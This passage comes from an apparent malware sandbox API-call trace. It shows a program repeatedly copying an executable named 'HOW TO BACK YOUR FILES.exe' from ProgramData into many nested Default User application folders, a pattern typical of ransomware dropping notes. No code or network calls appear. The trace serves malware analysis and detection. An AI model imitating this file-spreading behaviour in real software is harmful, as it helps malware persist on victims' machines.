FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.609] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.609] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.609] GetLastError () returned 0x0 [0042.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.609] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.609] CloseHandle (hObject=0x118) returned 1 [0042.610] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.610] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.610] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0042.610] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0042.610] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.610] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.610] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.611] GetLastError () returned 0x0 [0042.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.611] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.611] CloseHandle (hObject=0x118) returned 1 [0042.611] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.611] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.611] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0042.611] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0042.611] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.611] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.612] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.612] GetLastError () returned 0x0 [0042.612] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.612] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.612] CloseHandle (hObject=0x118) returned 1 [0042.612] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.612] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a7b6080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.612] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0042.612] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0042.612] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.612] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.613] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.613] GetLastError () returned 0x0 [0042.613] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.614] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.614] CloseHandle (hObject=0x118) returned 1 [0042.614] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.614] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8284a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8284a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.614] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0042.614] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0042.614] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.614] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.615] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.615] GetLastError () returned 0x0 [0042.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.615] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.615] CloseHandle (hObject=0x118) returned 1 [0042.615] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.615] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a874760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a874760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.616] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0042.616] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0042.616] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.616] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.617] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.617] GetLastError () returned 0x0 [0042.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.617] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.617] CloseHandle (hObject=0x118) returned 1 [0042.617] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.617] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.617] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0042.617] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0042.617] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.617] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.618] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.618] GetLastError () returned 0x0 [0042.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.618] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.618] CloseHandle (hObject=0x118) returned 1 [0042.618] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.618] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8e6b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8e6b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.619] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0042.619] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0042.619] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.619] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.619] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.619] GetLastError () returned 0x0 [0042.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.619] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.619] CloseHandle (hObject=0x118) returned 1 [0042.620] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.620] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.620] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0042.620] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0042.620] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.620] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.620] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.621] GetLastError () returned 0x0 [0042.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.621] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.621] CloseHandle (hObject=0x118) returned 1 [0042.621] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.621] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.621] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application 